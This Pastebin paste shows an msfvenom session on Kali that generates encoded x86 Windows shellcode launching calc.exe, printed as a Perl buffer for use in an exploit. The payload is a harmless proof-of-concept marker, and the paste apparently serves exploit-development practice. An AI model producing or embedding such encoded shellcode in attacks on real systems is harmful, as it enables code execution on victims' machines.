Advertisement
Guest User

msfvenom perl windows 7 payload, exit method added

a guest
Feb 21st, 2018
68
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.46 KB | None | 0 0
  1. root@kali:~# msfvenom -p windows/exec cmd=calc.exe,exitfunc=seh -a x86 -b '\x00\x09\x0a' -f perl
  2. No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  3. Found 10 compatible encoders
  4. Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
  5. x86/shikata_ga_nai succeeded with size 233 (iteration=0)
  6. x86/shikata_ga_nai chosen with final size 233
  7. Payload size: 233 bytes
  8. Final size of perl file: 1027 bytes
  9. my $buf =
  10. "\xba\xb7\xf8\xdf\x4d\xdb\xdb\xd9\x74\x24\xf4\x5d\x31\xc9" .
  11. "\xb1\x34\x31\x55\x14\x83\xc5\x04\x03\x55\x10\x55\x0d\x23" .
  12. "\xa5\x1b\xee\xdc\x36\x7b\x66\x39\x07\xbb\x1c\x49\x38\x0b" .
  13. "\x56\x1f\xb5\xe0\x3a\xb4\x4e\x84\x92\xbb\xe7\x22\xc5\xf2" .
  14. "\xf8\x1e\x35\x94\x7a\x5c\x6a\x76\x42\xaf\x7f\x77\x83\xcd" .
  15. "\x72\x25\x5c\x9a\x21\xda\xe9\xd6\xf9\x51\xa1\xf7\x79\x85" .
  16. "\x72\xf6\xa8\x18\x08\xa1\x6a\x9a\xdd\xda\x22\x84\x02\xe6" .
  17. "\xfd\x3f\xf0\x9d\xff\xe9\xc8\x5e\x53\xd4\xe4\xad\xad\x10" .
  18. "\xc2\x4d\xd8\x68\x30\xf0\xdb\xae\x4a\x2e\x69\x35\xec\xa5" .
  19. "\xc9\x91\x0c\x6a\x8f\x52\x02\xc7\xdb\x3d\x07\xd6\x08\x36" .
  20. "\x33\x53\xaf\x99\xb5\x27\x94\x3d\x9d\xfc\xb5\x64\x7b\x53" .
  21. "\xc9\x77\x24\x0c\x6f\xf3\xc9\x59\x02\x5e\x84\x9c\x90\xe4" .
  22. "\xea\x9e\xaa\xe6\x5a\xf6\x9b\x6d\x35\x81\x23\xa4\x71\x7d" .
  23. "\x6e\xe5\xd0\x15\x37\x7f\x61\x78\xc8\x55\xa6\x84\x4b\x5c" .
  24. "\x57\x73\x53\x15\x52\x38\xd3\xc5\x2e\x51\xb6\xe9\x9d\x52" .
  25. "\x93\x89\x40\xc0\x7f\x60\xe6\x60\xe5\x50\x8d\xe8\x8c\xdc" .
  26. "\x2b\x7d\x21\x7e\x89\x0e\xd8\xe8\xf1";
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement